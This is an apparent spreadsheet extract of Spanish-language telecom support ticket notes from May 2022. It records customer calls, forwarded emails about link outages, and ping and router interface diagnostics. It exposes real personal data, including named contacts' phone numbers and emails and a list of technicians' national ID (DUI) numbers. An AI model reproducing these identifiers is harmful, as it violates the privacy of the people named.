ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050431508887
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 18/05/2022 10:23:03</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, INDICA QUE ESTA SEMANA NO SE TIENE ACCESO A LA RED DEL ENLACE DE DATOS, CON EL INTERNET NO SE TIENEN INCONVENIENTES Y MENCIONA QUE LA IP ESPECIFICADA A LA CUAL NO SE PUEDE ACCEDER ES DE UN SERVIDOR DE CLARO EN GUATEMALA, SE PROCEDE A VALIDAR INFORMACION PROPORCIONADA POR CLIENTE.
NÚMERO: 0050431508887
FIN: HOY, 12:31
ID DE LLAMADA: 3001162113</t>
  </si>
  <si>
    <t>F4566755</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE JUAN RECINOS, INDICA QUE SOLICITA CAMBIO DE EQUIPO DEBIDO A LA ANTIGUEDAD QUE ESTE TIENE, INDICA QUE LO TIENEN DESDE HACE 7 AÑOS, PROPORCIONA LOS DATOS DE EJECUTIVO DE CUENTA  77457809 SILVIA  PARA PONERLE EN CONTACTO Y SE LE DE SEGUIMIENTO, SE PROCEDERA A CONTACTAR A EJECUTIVO DE CUENTA.
NÚMERO: 0050378424477
FIN: HOY, 16:56
ID DE LLAMADA: 3001255140</t>
  </si>
  <si>
    <t>###SE ENVIA CORREO AL CLIENTE PARA GESTIONAR PERMISOS##
DE: VELDIN JANITZIO PALENCIA FLORES
ENVIADO: JUEVES, 19 DE MAYO DE 2022 16:43
PARA: ADMINISTRACION@CASS.COM.SV &lt;ADMINISTRACION@CASS.COM.SV&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPORATIVOS, CLIENTES &lt;CLIENTESCORPORATIVOS@CLARO.COM.SV&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: GESTIÓN DE PERMISOS | CIA.DE ASES.Y SEGURIDAD S.A.DEC.V. |IDG000224SV | SAN SALVADORCOL. SAN FRANCISCOCALLE LOS ABETOS21FINAL PJE 3
BUENAS TARDES ESTIMADOS,
EN SEGUIMIENTO AL SERVICIO CIA.DE ASES.Y SEGURIDAD S.A.DEC.V. |IDG000224SV | SAN SALVADORCOL. SAN FRANCISCOCALLE LOS ABETOS21FINAL PJE 3
SOLICITAMOS DE SU APOYO GESTIONANDO ACCESOS PARA EL PERSONAL TÉCNICO INDICANDO LA HORA Y DÍA DE VISITA.
TECNICOS:
DUI                              CODIGO                            EMPLEADO
00936126-7                  4799                      MARIO ERNESTO CRUZ MARQUEZ
00354722-1                  4378                      RONAL MOREL CRESPIN
00157708-4                  4690                      ABRAHAM SAMUEL PEREZ
00580847-9                  2181                      CARLOS EDUARDO GOMEZ ZELEDON
02878871-1                   2437                     JOSE ALFREDO JIMENEZ
03245714-4                   8787                     ADAN ERNESTO GONZALEZ
01968544-3                   9407                      WALTER ERNESTO RODRIGUEZ PEREZ
01101266-2                   4605                      JOSE SALVADOR PORTILLO VELASQUEZ
04086816-7                   12404                     GERARDO ANTONIO MINERO
QUEDAMOS ATENTOS A SUS COMENTARIOS,
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4566759</t>
  </si>
  <si>
    <t>SE HABLO CON EL EJECUTIVO LUCERO PERDOMO, QUIEN VA A DAR SEGUIMIENTO CON EL PERSONAL DE COBROS.
SE LE INDICO QUE A NIVEL DE CLARO EL SERVICIO ESTA ACTIVO Y QUE LA LLAMADA COMPLETA.
3001031763
COLA:
NOMBRE: A: 0050432081722
NÚMERO: 0050432081722
DURACIÓN: 0:00:35
ESTADO: CONECTADA
DETALLES: 0050432081722
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 17/05/2022 18:14:20</t>
  </si>
  <si>
    <t>F4566764</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LIANIXI CRUZ 57577184 CONTESTA LA SEÑORITA MAYRA RIOS SOLICITA QUE SE LE LLAME A LAS 8:30 AM NUEVAMENTE YA QUE AUN NO ESTA EN SITIO**
ID 3001055595
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MAYRA RIOS AL 57577184 NO RESPONDE SE INTENTARA LUEGO **
ID 3001133624
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MAYRA RIOS 57577184 PARA BRINDAR RETROALIMENTACION
-ID 3001199274</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MAYRA RIOS AL 57577184 CONTESTA LA SEÑORITA KEYSEL  Y BRINDA LOS DATOS PARA VISITA Y SOLICITA QUE SE LE LLAME PARA SABER A QUE HORA LLEGA EL TECNICO**
HORARIO DE ATENCION: 9:00 A 18:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: MIGUELITO DETRAS DEL HOTEL SAN FRANCISCO.
ATENDERA EN SITIO: MAYRA RIOS O KEYSEL.
ID 3001165746
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MAYRA GARCIA AL 57577184 INDICA QUE ES NUMERO EQUIVOCADO  **
ID 3001164693
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  MAYRA RIOS AL 57577184 SOLICITA QUE SE LE LLAME EN 2 HRS YA QUE NO HAY ENERGIA EN SITIO **
ID 3001083221
**</t>
  </si>
  <si>
    <t>F4566771</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS CHIN 43246230 INIDCA QUE DESEA VALIDAR SI ESTA SALIENDO POR PRINCIPAL O REBUNDATE Y QUE AUN HAY PERDIDA DE PAQUETES INDICA || SE NOTIFICA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001134626
**</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 22040711 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; ÉSTE FUERA DE HORARIO LABORAL, LLAMAR MAÑANA A PARTIR DE LAS 08:00AM</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 16:11
PARA: WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CARLOS ALBERTO CHENG LOPEZ &lt;CARLOS.CHENG@COFAL.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: DIEGO FERNANDO GODOY RECKHOLDER &lt;DIEGO.GODOY@COFAL.COM.GT&gt;; 'ADM711@COFAL.COM.GT' &lt;ADM711@COFAL.COM.GT&gt;; OSCAR DANIEL GIRON REYES &lt;OSCAR.GIRON@CLARO.COM.GT&gt;; CESAR RIGOBERTO LEAL OLIVA &lt;CESARR.LEAL@CLARO.COM.GT&gt;
ASUNTO: RE: PROBLEMA CON EL ENLACE DE QUETZALTENANGO. MPLS - COFIÑO STAHL ENLACE DE DATOS 673000011T
*-*-*-*-*-*</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS CHIN 43246230 NO RESPONDE,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001102296
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS CHIN 43246230 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001065553</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS CHIN 43246230  QUIEN INDICA QUE ANTERIORMENTE EL CONTABA CON DOS SERVICIOS QUE ERA EL DE 5 MG ESTE ERA 3G  Y EL DE 10 MG QUE ERA POR FIBRA PERO EL INCONVENIENTE SE DIO YA DESDE HACE VARIOS MESES YA QUE FUE CUANDO SE REALIZO EL CAMBIO DE TELEFONICA A CLARO Y AHORA NO SABE QUE ES LO QUE TIENE CONTRATADO SOLICITA QUE SE VEA CON EL EJECUTIVO   RIGOBERTO DE LEAL || SE NOTIFICA A GESTOR  **
ID 3001158729
**
**</t>
  </si>
  <si>
    <t>-* CARLOS CHENG  (CLIENTE) SOLICITA SE LE RESPONDA EL CORREO ENVIADO CON LA SIGUIENTE INFORMACION:
¿	GRAFICA DEL ENLACE, NO APARECE EN EL GRAFICADOR DE MONITOREO DE ENLACE.
¿	REVISIÓN SI SE ESTA PASANDO POR EL ENLACE PRINCIPAL DE MPLS O EL DE CONTINGENCIA.
SE SOLICITA APOYO A CNOC -*
-*</t>
  </si>
  <si>
    <t>F4566822</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: MARTES, 17 DE MAYO DE 2022 20:24PARA: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_WALMART_SV_ID104106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6822
ID: ID1041062SV
IDENTIFICADOR DEL CLIENTE:  CC_WALMART_SV_ID1041062
UBICADO EN:  ILOPANGOCTRO. COM. UNICENTRO ALTAVISTAEDIFICIO AS/NDESPENSA DE DON JUAN CARRORO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4566830</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE EDWIN TUBAC AL 23049696 CONTESTA EL SEÑOR  JOSE LUIS ZUM QUIEN INDICA QUE SE DEJE EN OBSERVACION PARA MEDIO DIA YA QUE ELLOS ESTARAN CONTACTANDO A CL FINAL PARA CONFIRMAR Y PODERNOS VALIDAR**
ID 3001066106
**</t>
  </si>
  <si>
    <t>F4566913</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE WILVER MAGAÑA AL  3006 0665  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001178721
**</t>
  </si>
  <si>
    <t>***--- CLIENTE COMPARTE CONTACTO EN PR PARA RUEBAS E INDICA QUE SE LLAME A PARTIR DE LAS 08:00 HRS ---***
DE: WILVER JOEL MAGAÑA MEJIA [MAILTO:WILVER.MAGANA@NATURACEITES.COM]
ENVIADO EL: MIÉRCOLES, 18 DE MAYO DE 2022 05:32
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; MONITOREO IT &lt;MONITOREOIT@NATURACEITES.COM&gt;; CARLOS GUERRERO &lt;CARLOS.GUERRERO@NATURACEITES.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOPORTE &lt;SOPORTE@NATURACEITES.COM&gt;
CC: MYNOR JOSUE URRUTIA JIMENEZ &lt;MYNOR.URRUTIA@NATURACEITES.COM&gt;; ALECX ARMANDO ROJAS TUNCHEZ &lt;ALECX.ROJAS@NATURACEITES.COM&gt;
ASUNTO: RE: SERVICIO CAÍDO PARA NATURACEITES | SEDE FRAY | INTERNET CLARO ID:379200002 (PING) | FECHA/HORA: 17/05/2022 23:25:25
BUENOS DIAS
   CORRESPONDIENTE AL CASO, PUEDEN CONTACTAR A ALEX ROJAS AL TEL: 3118-4076 O MYNOR URRUTIA AL TEL: 3010 0745
A LAS 8.00 AM.
SALUDOS
________________________________________</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE NECESITA PRUEBAS DE PRIMER NIVEL, A LA ESPERA DE RESPUESTA.
ELVYN ARIEL LOPEZ RECINOS
BUENA NOCHE ESTIMADO CLIENTE;
SE REALIZO LAS VERIFICACIONES CORRESPONDIENTES, SE DETECTA PUERTO ÓPTICO DOWN HACIA EL EQUIPO CTC UBICADO EN LAS INSTALACIONES DEL CLIENTE, POR LO QUE SE NECESITA PRUEBAS DE PRIMER NIVEL, SU APOYO COMPARTIENDO CONTACTO DE SITIO Y HORARIO DE ATENCIÓN.
SALUDOS</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE  ALEX ROJAS AL 3118-4076 SE CONTACTA A CLIENTE INIDCA QUE YA ESTA EN SITIO SE TRATA DE LOCALIZAR A GESTOR PERO NO SE OBTIENE RESPUESTA SE NOTIFICA PARA EL SEGUIMIENTO **
ID 3001064329
**</t>
  </si>
  <si>
    <t>F4566915</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL SOLICITANDO VALIDAR --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 18 DE MAYO DE 2022 01:29
PARA: SMC RECOVERY AMERICAS BUSINESS SOLUTIONS &lt;SMC.RECOVERY.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: REPORTANDO | VISA * GUATEMALA * VISA-GUA-GUA-0002 * CID 389063 *BOUNCING* INC000003731713
BUENOS DÍAS ESTIMADO SR. GARCIA.
                PERSONAL A CARGO NOS INDICA QUE EL SERVICIO SE ENCUENTRA OPERATIVO Y SIN EVENTOS DESDE NUESTRO LADO.
SENDING 1500, 100-BYTE ICMP ECHOS TO 10.19.111.86, TIMEOUT IS 2 SECONDS:
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
SUCCESS RATE IS 100 PERCENT (1500/1500), ROUND-TRIP MIN/AVG/MAX = 4/6/120 MS
PODRÍA APOYARNOS EN VALIDAR NUEVAMENTE DESDE SU LADO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN</t>
  </si>
  <si>
    <t>F4566957</t>
  </si>
  <si>
    <t>***--- CL PIDE MONITOREO  MIENTRAS VALIDA CON EL PERSONAL DE PR EN HORARIO HABIL -***
DE: JUAN DE DIOS URIZAR [MAILTO:JURIZAR@QUATTRO.COM.GT]
ENVIADO EL: MIÉRCOLES, 18 DE MAYO DE 2022 00:53
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; JONATAN GOMEZ &lt;JGOMEZ@QUATTRO.COM.GT&gt;
CC: MISSION CONTROL &lt;MISSIONCONTROL@QUATTRO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; SAMUEL ANTONIO ESTRADA GREGORIO &lt;SAMUEL.ESTRADAG@CLARO.COM.GT&gt;; KEVIN UBEDA &lt;KUBEDA@QUATTRO.COM.GT&gt;; YENSI SUCELY CALGUA MATEO &lt;YENSI.CALGUA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; JOSE DAVID RAMIREZ STAMBUK &lt;JOSEDAV.RAMIREZ@CLARO.COM.GT&gt;; ANGEL ARMANDO CLAVEL TOLEDO &lt;ANGEL.CLAVEL@CLARO.COM.GT&gt;; JERSON GUTIERREZ &lt;JGUTIERREZ@QUATTRO.COM.GT&gt;; OMAR MARTINEZ &lt;OMARTINEZ@QUATTRO.COM.GT&gt;
ASUNTO: RE: ENLACE CAIDO
BUENOS DÍAS, EDUARDO / TEAM CLARO.
LES COMENTO QUE EL ENLACE SE OBSERVA ACTIVO; SIN EMBARGO, ES NECESARIO CONFIRMAR OPERATIVIDAD CON EL PERSONAL DE LA AGENCIA, POR LO QUE SOLICITAMOS DE SU COLABORACIÓN PARA QUE SE MANTENGA EN MONITOREO Y EL TICKET EN HOLD. ADICIONALMENTE SOLICITAMOS NOS PUEDAN COMPARTIR EL RFO.
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4566968</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIDAR --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 18 DE MAYO DE 2022 01:54
PARA: BRUGADA HERNANDEZ DANIEL &lt;DBRUGADA@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 874548OH ::: TICKET CNOC IMBBL003932 ::: FUERA DE SERVICIO
ESTIMADO SR. DANIEL.
                PERSONAL DEL CNOC CLARO NOS INDICA QUE EL SERVICIO SE ENCUENTRA OPERATIVO DESDE NUESTRO LADO.
ADICIONAL NO SE OBSERVAN EVENTOS, PODRÍA APOYARNOS INDICANDO COMO OBSERVA EL SERVICIO DESDE SU LADO Y SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4566970</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO DEJAN LLAMADA EN ESPERA Y NO RETOMAN , SE INTENTARA LUEGO **
ID 3001057348
**</t>
  </si>
  <si>
    <t>***---  SE ENVÍA CORREO A CL PARA VALIDAR --*-**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 18 DE MAYO DE 2022 01:40
PARA: ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 99900370T::: TICKET CNOC IMGRC006837 ::: "FUERA DE SERVICIO "
BUENOS DÍAS ESTIMADO SR. ESTRADA.
                PERSONAL DEL CNOC CLARO NOS INDICA QUE EL SERVICIO SE ENCUENTRA OPERATIVO Y NO SE OBSERVAN EVENTOS DE NUESTRO LADO.
PODRÍA APOYARNOS EN INDICAR DESDE SU LADO COMO OBSERVA LA OPERATIVIDAD ACTUAL DEL SERVICIO.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4566973</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR MALAQUIAS INDICA QUE EL EN UN MOMENTO ESTARA LLAMANDO AL SITIO Y REALIZANDO PRUEBAS DE PRIMER NIVEL Y NOS ESTARA RESPONDIENDO POR CORREO SI LEVANTO O NO **
ID 3001057996
**</t>
  </si>
  <si>
    <t>F4566975</t>
  </si>
  <si>
    <t>SE INTENTO LLAMAR PERO NO SE LOGRA COMUNICACIÓN, LLAMADA ES DEVIADA
RESULTADO: LLAMADA HECHA
NOMBRE: 52083208
NÚMERO: 52083208
INICIO: HOY, 13:05
FIN: HOY, 13:05
DURACIÓN: 0:07
ID DE LLAMADA: 3001874209</t>
  </si>
  <si>
    <t>SE INTENTA LLAMAR A CARLOS VALLADARES  3005-2590 PARA SOLICITAR UN NUEVO CONTACTO PERO ENVIA DIRECTO A BUZON
3001884775
COLA:
NOMBRE: A: 30052590
NÚMERO: 55280199
DURACIÓN: 0:00:17
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MONICAMARROQUIN
FECHA Y HORA LOCALES: 19/05/2022 13:14:34</t>
  </si>
  <si>
    <t>F4566986</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTGA EL SEÑOR OSWALDO QUIEN INDICA QUE SE PUEDE PROCEDER CON EL CIERRE YA QUE DE SU LADO FUE CERRADO POR EL SEÑOR DANIEL BRUGADA**
ID 3001058442
**</t>
  </si>
  <si>
    <t>F4567016</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR DIEGO MORA CONFIRMA SERVICIO OK Y AUTORIZA CIERRE
 DE TICKET **
ID 3001059972
**</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL PARA VALIDAR --***
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MIÉRCOLES, 18 DE MAYO DE 2022 03:54
PARA: VICTOR NUNEZ (VENDOR) &lt;VICTOR.NUNEZ2@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI AVENIDA BOLIVAR ID: 593835
ESTIMADO SR. VICTOR.
                CONTINUANDO CON EL SEGUIMIENTO, PERSONAL DEL CNOC NOS INDICA QUE DE NUESTRO LADO NO SE VEN EVENTOS Y EL SERVICIO SE OBSERVA OPERATIVO Y ESTABLE.
PODRÍA APOYARNOS EN VALIDAR DESDE SU LADO E INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>F4567037</t>
  </si>
  <si>
    <t>SE OBSEVA INTERFACE CAIDA EN EL ID: 1664322, SE ENVIA CORREO A CLIENTE CON LO ENCONTRADO.
1733681_CSC4321_BANCO_DE_HONDURAS_TEG33_DT140MB#SH INT DESC
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          ADMIN DOWN     DOWN
GI0/0.3256                     ADMIN DOWN     DOWN     /_/1733681/_/DT140M_BANCO-DE-HONDURAS-AGALTA_TEG33
GI0/1                          UP             UP
GI0/1.2140                     UP             UP       GESTION
GI0/1.3256                     UP             UP       /_/1664322/_/DT140M_BANCO-DE-HONDURAS-AGALTA_TEG33 ***EN PROCESO DE BAJA EL 27-4-2022, +504 2205-4373***
GI0/2                          DOWN           DOWN
GI0/0/0                        UP             UP       LAN_CONTRA_VENTU
GI0/1/0                        DOWN           DOWN     TUNEL A LOMA LINDA /_/1664334/_/
GI0/2/0                        UP             UP       EDIFICIO EL PARQUE /_/1664592/_/
GI0/3/0                        DOWN           DOWN
LO0                            UP             UP       LOOPBACK_L2TPV3_TUNNEL
TU0                            UP             UP       VENTU /_/1664329/_/
1733681_CSC4321_BANCO_DE_HONDURAS_TEG33_DT140MB#!!!
1733681_CSC4321_BANCO_DE_HONDURAS_TEG33_DT140MB#
1733681_CSC4321_BANCO_DE_HONDURAS_TEG33_DT140MB#
1733681_CSC4321_BANCO_DE_HONDURAS_TEG33_DT140MB#SH LOG | IN 0/1/0
*OCT  5 18:14:07.355: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*OCT  5 18:14:08.355: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*OCT  5 18:40:54.355: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*OCT  5 18:40:55.359: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*OCT  5 18:41:02.355: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*OCT  5 18:41:03.355: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*NOV  6 19:44:06.164: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*NOV  6 19:44:07.164: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*NOV  6 19:44:27.164: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*NOV  6 19:44:28.164: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*DEC  4 22:31:13.997: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*DEC  4 22:31:14.997: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*DEC  4 22:31:17.997: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*DEC  4 22:31:18.997: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO UP
*DEC  4 22:31:22.997: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*DEC  4 22:31:23.997: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
*MAY 18 13:16:00.937: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*MAY 18 13:16:03.693: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1/0, CHANGED STATE TO DOWN
1733681_CSC4321_BANCO_DE_HONDURAS_TEG33_DT140MB#</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE RESPUESTA:
ASUNTO: INC0104385987 #P1 [SINGLE-THREADED - LATAM/HONDURAS - IN COUNTRY CONNECTIVITY SINGLE-THREADED DUE TO CLARO CIRCUIT FAILURE - RHNBDK69-T4B01-4451] OSPF PASSIVE</t>
  </si>
  <si>
